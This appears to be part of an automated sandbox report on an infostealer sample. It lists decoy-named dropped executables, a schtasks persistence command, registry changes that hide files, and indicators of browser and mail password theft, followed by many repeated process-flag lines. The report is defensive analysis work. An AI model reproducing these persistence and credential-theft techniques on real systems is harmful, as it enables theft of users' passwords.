Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: B6LNCKjOGt5EmFQ.exe

Static file information: File size 1891328 > 1048576

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1cd000

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Pictures.exe, 0000000A.00000002.325931485.000000000093D000.00000004.00000020.sdmp
Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Pictures.exe
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Pictures.exe
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Pictures.exe
Source:	Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, LOGO AND PICTURES.exe
Source:	Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, LOGO AND PICTURES.exe, 00000009.00000002.604546258.0000000000DB2000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: Pictures.exe.8.dr, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Pictures.exe.8.dr, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Pictures.exe.8.dr, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Pictures.exe.8.dr, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_00FE4DDA push ebx; retf	0_2_00FE4DDB
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_00FE2ECC push 205A0B4Ch; retf	0_2_00FE2ED1
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_00FE6F30 push ecx; iretd	0_2_00FE704E
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_00FE5630 push ss; retf	0_2_00FE5631
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_00FE6413 push ds; iretd	0_2_00FE6428
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 7_2_00516413 push ds; iretd	7_2_00516428
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 7_2_00515630 push ss; retf	7_2_00515631
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 7_2_00516F30 push ecx; iretd	7_2_0051704E
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 7_2_00514DDA push ebx; retf	7_2_00514DDB
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 7_2_00512ECC push 205A0B4Ch; retf	7_2_00512ED1
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 8_2_00AC2ECC push 205A0B4Ch; retf	8_2_00AC2ED1
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 8_2_00AC4DDA push ebx; retf	8_2_00AC4DDB
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 8_2_00AC5630 push ss; retf	8_2_00AC5631
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 8_2_00AC6F30 push ecx; iretd	8_2_00AC704E
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 8_2_00AC6413 push ds; iretd	8_2_00AC6428
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321C471 push es; ret	9_2_0321C486
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001C0712 push eax; ret	10_2_001C0726
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001C0712 push eax; ret	10_2_001C074E
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0019BA9D push eax; ret	10_2_0019BAB1
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0019BA9D push eax; ret	10_2_0019BAD9

Source: initial sample	Static PE information: section name: .text entropy: 7.9172695107
Source: initial sample	Static PE information: section name: .text entropy: 7.9172695107

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	File created: C:\Users\user\AppData\Roaming\TcVfsyyjYuQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	File created: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	File created: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	File created: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Jump to dropped file
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	File created: C:\Users\user\AppData\Local\Temp\Pictures.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp'

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
